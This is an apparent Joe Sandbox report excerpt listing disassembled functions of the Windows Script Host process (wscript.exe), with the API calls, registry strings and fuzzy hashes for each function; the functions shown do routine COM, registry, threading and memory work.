                                                                                                                                                                                                                      • Instruction ID: fc5585d0b3cba388d38b68a64883c132bad2febd4b7a7982e9b78ca3d38ef964
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b9c5023dfc2852b4d1f8eab6711c8fc7d374a3398b521cd45b71072fb1889bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB11B2B1A10106ABEF11AB85D809BAE7E7EFFC0700F2400A9BC0177251CB705E45EB90
                                                                                                                                                                                                                      Function 0058808B Relevance: 7.6, APIs: 5, Instructions: 103windowthreadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 005880C5
                                                                                                                                                                                                                      • CoRegisterClassObject.OLE32(00583A14,00000000,00000014,00000000,?,00000000,00000000,?,?,?,00589188,000000FF,000000FF,000000FF), ref: 005880ED
                                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0058814D
                                                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0058815A
                                                                                                                                                                                                                      • CoRevokeClassObject.OLE32(?,?,?,00589188,000000FF,000000FF,000000FF,?,?,00000000), ref: 00588167
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClassMessageObject$CurrentDispatchRegisterRevokeThreadmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2658232301-0
                                                                                                                                                                                                                      • Opcode ID: 71827732d60e2f1ec6682d26e6d3c11aac84cc6aea8b4f14020559fa26d9fd45
                                                                                                                                                                                                                      • Instruction ID: e1a0d3dca58f10d23e432f816a4e6061450cd5d921c1fe46b6390424c542d5d1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71827732d60e2f1ec6682d26e6d3c11aac84cc6aea8b4f14020559fa26d9fd45
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95319075600215EBCB10AF69CC4C9AEBEB8FF88310F55445AEA01B7250CF35DC06DB61
                                                                                                                                                                                                                      Function 005959B9 Relevance: 7.6, APIs: 5, Instructions: 97registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,005810C4,005810C4,?,00000000,005810C4), ref: 00595A08
                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00595A52
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?,005810C4,005810C4,?,00000000,005810C4), ref: 00595A6A
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,?,?,?,?,005810C4,005810C4,?), ref: 00595A9C
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,000000FF,00000001,?,?,?,?,005810C4,005810C4,?), ref: 00595AA6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3112009249-0
                                                                                                                                                                                                                      • Opcode ID: ff08bc05cff4751948a31ef900668d2c87c5bd5a5dac172349e5feb3c5cef734
                                                                                                                                                                                                                      • Instruction ID: 3aebad679afb3b41fed41c15950cacb50c7b87517458b2c20f39de813b7c0fc6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff08bc05cff4751948a31ef900668d2c87c5bd5a5dac172349e5feb3c5cef734
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8931E231A00919BFCF228B6A8C8CAEF7FB8FF05325F50825AF515D6150E6349964CBA4
                                                                                                                                                                                                                      Function 0058FDD5 Relevance: 7.6, APIs: 5, Instructions: 86threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0058FE04
                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,005810C4,00000001,005810C4,?,005894FA,00000001,00581314,-00000001,0zX,005810C4), ref: 0058FE26
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,005894FA,00000001,00581314,-00000001,0zX,005810C4), ref: 0058FE33
                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0058FEB0,00000000,00000000,00000014), ref: 0058FE57
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,005894FA,00000001,00581314,-00000001,0zX,005810C4), ref: 0058FE71
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread$CloseCurrentErrorEventHandleLastmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1671080663-0
                                                                                                                                                                                                                      • Opcode ID: 8ca4377701b90a64fa483bd8188cca23a3c3a63af9d219db24dfd85aa51b2da0
                                                                                                                                                                                                                      • Instruction ID: d5ce24c44410f4291983d5745c752b78be2e5d57dc88c3ee5be5b421a6a81807
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ca4377701b90a64fa483bd8188cca23a3c3a63af9d219db24dfd85aa51b2da0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF2181B6900B17AF8710AF5AD888916FEBCFF98354311463EAC15A7611D731EC519BE0
                                                                                                                                                                                                                      Function 0058E988 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 265comCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0059792D: malloc.MSVCRT ref: 00597945
                                                                                                                                                                                                                        • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951E5
                                                                                                                                                                                                                        • Part of subcall function 005951D4: HeapFree.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 005951EC
                                                                                                                                                                                                                        • Part of subcall function 005951D4: GetProcessHeap.KERNEL32(00000000,005810C4,00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 0059520B
                                                                                                                                                                                                                        • Part of subcall function 005951D4: HeapAlloc.KERNEL32(00000000,?,0058E9EB,00001000,00000000,005810C4,005810C4), ref: 00595212
                                                                                                                                                                                                                      • CLSIDFromString.OLE32(00589571,?,00001000,00000000,005810C4,005810C4), ref: 0058EA00
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00583860,00000000), ref: 0058EA21
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$Process$AllocCreateFreeFromInstanceStringmalloc
                                                                                                                                                                                                                      • String ID: WSH$WScript
                                                                                                                                                                                                                      • API String ID: 2172334828-1019903269
                                                                                                                                                                                                                      • Opcode ID: 8b6de932e399df4fd310ef877ad9838121ebcac066e5c72261f3b1c6b37a18c6
                                                                                                                                                                                                                      • Instruction ID: f739227208d7bf2c1832b06867fef2ff1c8473f87491bc31aed5f902201d064a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b6de932e399df4fd310ef877ad9838121ebcac066e5c72261f3b1c6b37a18c6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96918F75B002169FDB04EF99D896A6D7BF5FF4C710F25006AE942AB390CE74AC06CB94
                                                                                                                                                                                                                      Function 005921CD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00595901: RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8), ref: 00595933
                                                                                                                                                                                                                        • Part of subcall function 00595AB3: RegQueryValueExW.ADVAPI32(00000000,TrustPolicy,00000000,-00000001,00000004,00000004,TrustPolicy,005810C4,00000000,005810C4,00000000,-00000001), ref: 00595AEE
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,00000000,-00000001,00020019,00000000,0zX,?,?,?,0058AB73,80000002,0zX), ref: 00592258
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseCreateQueryValue
                                                                                                                                                                                                                      • String ID: 0zX$DisplayLogo$Timeout
                                                                                                                                                                                                                      • API String ID: 4083198587-1400144622
                                                                                                                                                                                                                      • Opcode ID: ca9a03d89f5c644698ee5c4315b80bb903d4ad0db8cd1dc6eeb522924951bbe8
                                                                                                                                                                                                                      • Instruction ID: 804b8b0aa753229a99e2e3f0dc88c171269fe9d99362b530bd8a039272eb3ad8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca9a03d89f5c644698ee5c4315b80bb903d4ad0db8cd1dc6eeb522924951bbe8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11023620060AABDF11CBA8C845F9E7EEABBD4314F20802DE85AC3240EA70ED41D721
                                                                                                                                                                                                                      Function 00597824 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • bsearch.MSVCRT ref: 0059784F
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000057,?,?,00597692), ref: 0059785E
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000007A,?,?,?,?,?,00597692), ref: 00597895
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$bsearch
                                                                                                                                                                                                                      • String ID: FX
                                                                                                                                                                                                                      • API String ID: 3873383229-77573815
                                                                                                                                                                                                                      • Opcode ID: 5afcf3b14ed47a7864956f98b29915d317b7cc12ad39a9b116a7dc4a90b23d16
                                                                                                                                                                                                                      • Instruction ID: 1aed1df5b45d1fca328abf9ebea114a3b72eb16b3773571f17624927bb47056a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5afcf3b14ed47a7864956f98b29915d317b7cc12ad39a9b116a7dc4a90b23d16
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18019C35728709B7CF2457288C0DB7B3B68FFCCB44B05406AED06EB240E2609D01D6A0
                                                                                                                                                                                                                      Function 0058A5A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(00000000,Shell,00000000,00020006,?,00000000,00000000,?,0058A758,?,Open2,?,0058A8DE,00000000), ref: 0058A5BA
                                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00583DC0,00000000,00000001,0058A758,00000001,?,0058A758,?,Open2,?,0058A8DE,00000000), ref: 0058A5F0
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,0058A758,?,Open2,?,0058A8DE,00000000), ref: 0058A5FB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                                                                                                      • String ID: Shell
                                                                                                                                                                                                                      • API String ID: 779948276-2220072441
                                                                                                                                                                                                                      • Opcode ID: ee50aea2086be9a2299d2193e30e8113fc17d143a5dd06d8270a92e6f3304f21
                                                                                                                                                                                                                      • Instruction ID: 11ec91d3f9dd2869cf3bce968fcc03dfebe760a776777821ee11674f76c38a2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee50aea2086be9a2299d2193e30e8113fc17d143a5dd06d8270a92e6f3304f21
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5701F937E40234BBEF255B548C05FBE7B29FB80B50F15816AFD42BB140D662DE059790
                                                                                                                                                                                                                      Function 00592266 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00595901: RegCreateKeyExW.ADVAPI32(00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,00000000,00000000,00000000,?,00000000,-00000001,?,005810C4,00000000,00000000,?,005921E8), ref: 00595933
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,0zX,00020006,00000000,-00000001,?,?,0058AD26,?,80000001,80000002,0zX), ref: 005922C5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseCreate
                                                                                                                                                                                                                      • String ID: 0zX$DisplayLogo$Timeout
                                                                                                                                                                                                                      • API String ID: 2932200918-1400144622
                                                                                                                                                                                                                      • Opcode ID: 3eb327173242280cc3d3fdb415d8c545d0c39b583859b4218a36eca66c40189a
                                                                                                                                                                                                                      • Instruction ID: ec62ea4e0f4dc4e912ef7b2c1bf5b7dc26427c056462a966dfa52cdb019d50a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eb327173242280cc3d3fdb415d8c545d0c39b583859b4218a36eca66c40189a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF0C8797046157BEF11D3A4890ABABBFE9FB82360F140565FD05E7281E670ED10D7A0
                                                                                                                                                                                                                      Function 0059523C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00593068,00589625,00000064,00589624,?,00593030,00593068,?,0058EC8A,?,00589624,?,P0Y,005810C4,00593030), ref: 005952BF
                                                                                                                                                                                                                      • HeapReAlloc.KERNEL32(00000000,?,0058EC8A,?,00589624,?,P0Y,005810C4,00593030,?,00589862,00000000,?,?,00589624,?), ref: 005952C6
                                                                                                                                                                                                                      • memcpy.MSVCRT(00003790,?,00589624,00589624,?,00593030,00593068,?,0058EC8A,?,00589624,?,P0Y,005810C4,00593030), ref: 00595301
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocProcessmemcpy
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 4164033339-2564639436
                                                                                                                                                                                                                      • Opcode ID: 61af4ba5295f7576e86b43829960ba5f0444cdbdcdf76b18bc8448021ee23ab4
                                                                                                                                                                                                                      • Instruction ID: adf5724b1ad01f39da66a64f71ee292a39b7581d348be7ff80c2742231a33007
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61af4ba5295f7576e86b43829960ba5f0444cdbdcdf76b18bc8448021ee23ab4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39210631314A029FDF258F3DD955A1EBBAABF94390B208D2DE055CB1A1F7B1E8608704
                                                                                                                                                                                                                      Function 005862DE Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005862EE
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 005862F7
                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00586300
                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,?,?,0058646A), ref: 0058637A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeString$CriticalDeleteSection
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 178840971-0
                                                                                                                                                                                                                      • Opcode ID: 7226dd01b532aca43075d5c5bbf6a644172adccc26a3b440371546b641ba1aaf
                                                                                                                                                                                                                      • Instruction ID: 1028752200215dce9cdc2364f45a86455797c8f735b3429c185cfcd084cf7306
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7226dd01b532aca43075d5c5bbf6a644172adccc26a3b440371546b641ba1aaf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A1194B5340110ABCB186F19EC99A1D3F62FF88311F1A049DE9065B361CF319C02DB95
                                                                                                                                                                                                                      Function 00595017 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadStringW.USER32(?,?,00000800,00000000), ref: 00595055
                                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000800,00000000), ref: 00595071
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,?,00000800,00000000,00000000,00000000,?,0058BAA2,?,?), ref: 0059508E
                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 005950A1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Load$AllocByteCharMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1944948655-0
                                                                                                                                                                                                                      • Opcode ID: 456257a14e3bb192d978bb410f5a51d3290377d3861ed29a943c1bf1b20a0b0d
                                                                                                                                                                                                                      • Instruction ID: 435603868f3e6caf0061ef0849f24a6f81d87e0ec3c75ef3df2029b17fc470a6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 456257a14e3bb192d978bb410f5a51d3290377d3861ed29a943c1bf1b20a0b0d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F211827650151AAFEF628B69DC48DFABBACFB59710F054066B605D2150EF308E09DBA0
                                                                                                                                                                                                                      Function 005961F1 Relevance: 6.1, APIs: 4, Instructions: 51fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00589D3D,00000000,00000000,00000000,?,005961DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 0059620F
                                                                                                                                                                                                                      • CreateFileMappingA.KERNEL32(00589D3D,00000000,00000002,00000000,00000000,00000000), ref: 00596229
                                                                                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,005961DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 0059623C
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,005961DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,00000000,00000000), ref: 00596249
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CreateErrorLastMappingSizeView
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2735091159-0
                                                                                                                                                                                                                      • Opcode ID: 6af3750e68f6920df135a4e99451e1fba060de0a8ae9e88789ec04e09593507c
                                                                                                                                                                                                                      • Instruction ID: 631e0d1d4c071aa103c85ced973133688f6d9815b43f06af386c1e2b46ccdbe2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6af3750e68f6920df135a4e99451e1fba060de0a8ae9e88789ec04e09593507c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D10167785003526ADF301B7B5C0CE277FEDFBD6760B10492EB565C2190D634D808D670
                                                                                                                                                                                                                      Function 0058FA3A Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0058FA70
                                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,00001CFF), ref: 0058FA87
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageMultipleObjectsPeekWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3986374578-0
                                                                                                                                                                                                                      • Opcode ID: dde487afa3fbc958f6360e62a8d033e2b1a1dff79d91816f122e36aff6d48c4d
                                                                                                                                                                                                                      • Instruction ID: 271b814a480a21acba230497f5b393771a58a72165825a9fe12e5abab6d99201
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dde487afa3fbc958f6360e62a8d033e2b1a1dff79d91816f122e36aff6d48c4d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19F0C272504025B79F14ABA69C48CEF7F6DFBD9330720022AF925F2090E634C505D770
                                                                                                                                                                                                                      Function 00587034 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00587041
                                                                                                                                                                                                                      • CoGetInterfaceAndReleaseStream.OLE32(?,005838D0,?), ref: 0058707B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentInterfaceReleaseStreamThread
                                                                                                                                                                                                                      • String ID: wscript
                                                                                                                                                                                                                      • API String ID: 1806872144-434116418
                                                                                                                                                                                                                      • Opcode ID: a3e8b24eac03e11544957a31dd5293888fcf3ec8c956638e76e8bc677d013f4c
                                                                                                                                                                                                                      • Instruction ID: 7380f9a28448e94cb71de2b8981d4f7a1b9c5d8b61825e1ca547e3ab41e41efe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3e8b24eac03e11544957a31dd5293888fcf3ec8c956638e76e8bc677d013f4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB51F73130470A9FE720BB64C88DB69BFF5BF88704F20051DE9426BA91DBB5E804CB41
                                                                                                                                                                                                                      Function 005899DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93comCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00583980,00000000,00000017,00583BD0,p4Y,00000000,005810C4,00000001,005810C4,?,005894CB,-00000001,0zX), ref: 00589A0A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_580000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                                                      • String ID: p4Y
                                                                                                                                                                                                                      • API String ID: 542301482-36547557
                                                                                                                                                                                                                      • Opcode ID: 38a6e03abd3faf30ec7910d946b0392d6315d02e6458df255ca3a5abe0736854
                                                                                                                                                                                                                      • Instruction ID: e039971a2e3b1363918b494e9ec79190b9802df77d7448cb8a2addbd4241097d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38a6e03abd3faf30ec7910d946b0392d6315d02e6458df255ca3a5abe0736854
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F31B175744210AFDB09AF18CC85B7D3FA6FB89714F1900ADED02AB291CA75AD05D790